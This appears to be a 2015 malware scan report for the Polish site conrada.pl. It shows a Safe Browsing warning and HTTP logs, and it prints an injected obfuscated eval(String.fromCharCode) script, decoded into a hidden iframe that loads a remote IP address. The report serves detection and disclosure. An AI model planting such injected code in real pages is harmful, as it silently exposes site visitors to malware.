Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=conrada.pl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://conrada.pl/ | 200 OK Content-Length: 2877 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(118,97,114,32,103,103,51,61,34,53,56,46,34,59,118,97,114,32,119,61,34,54,53,34,59,118,97,114,32,114,101,54,61,34,46,50,51,55,34,59,118,97,114,32,114,114,61,34,46,49,51,48,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,103,103,51,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,113,101,47,39,43,39,105,110,100,101,39,43,39,120,46,112,104,112,39,43,39,34,32,115,116,121,108,101,61,34,100,105,115,39,43,39,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,49,48,48,48,50,48,48)) Decoded script: var gg3="58.";var w="65";var re6=".237";var rr=".130";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+gg3+''+w+''+re6+''+rr+'/'+'qqqe/'+'inde'+'x.php'+'" style="dis'+'play:n'+'one"></if'+'rame>');var t=0001000200 var gg3="58.";var w="65";var re6=".237";var rr=".130";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+gg3+''+w+''+re6+''+rr+'/'+'qqqe/'+'inde'+'x.php'+'" style="dis'+'play:n'+'one"></if'+'rame>');var t=0001000200 <iframe src="http://58.65.237.130/qqqe/index.php" style="display:none"></iframe> Antivirus reports:
| ||
http://conrada.pl/test404page.js | 404 Not Found Content-Length: 185 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: conrada.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 03:40:28 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html
GET / HTTP/1.1
Host: conrada.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 03:40:28 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: conrada.pl
Referer: http://www.google.com/search?q=conrada.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: conrada.pl
Referer: http://www.google.com/search?q=conrada.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.